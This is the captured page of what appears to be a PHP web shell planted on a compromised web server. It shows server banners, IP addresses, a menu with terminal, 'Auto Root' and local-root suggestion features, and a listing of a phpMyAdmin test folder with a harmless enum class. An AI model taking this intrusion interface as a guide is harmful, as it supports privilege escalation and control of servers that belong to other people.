Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.15.10.50
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
myadmin /
vendor /
dasprid /
enum /
test /
Delete
Unzip
Name
Size
Permission
Date
Action
AbstractEnumTest.php
3.71
KB
-rw-r--r--
2021-02-05 18:31
EnumMapTest.php
7.46
KB
-rw-r--r--
2021-02-05 18:31
NullValueTest.php
916
B
-rw-r--r--
2021-02-05 18:31
Planet.php
1.6
KB
-rw-r--r--
2021-02-05 18:31
WeekDay.php
633
B
-rw-r--r--
2021-02-05 18:31
Save
Rename
<?php declare(strict_types = 1); namespace DASPRiD\EnumTest; use DASPRiD\Enum\AbstractEnum; /** * @method static self MONDAY() * @method static self TUESDAY() * @method static self WEDNESDAY() * @method static self THURSDAY() * @method static self FRIDAY() * @method static self SATURDAY() * @method static self SUNDAY() */ final class WeekDay extends AbstractEnum { protected const MONDAY = null; protected const TUESDAY = null; protected const WEDNESDAY = null; protected const THURSDAY = null; protected const FRIDAY = null; protected const SATURDAY = null; protected const SUNDAY = null; }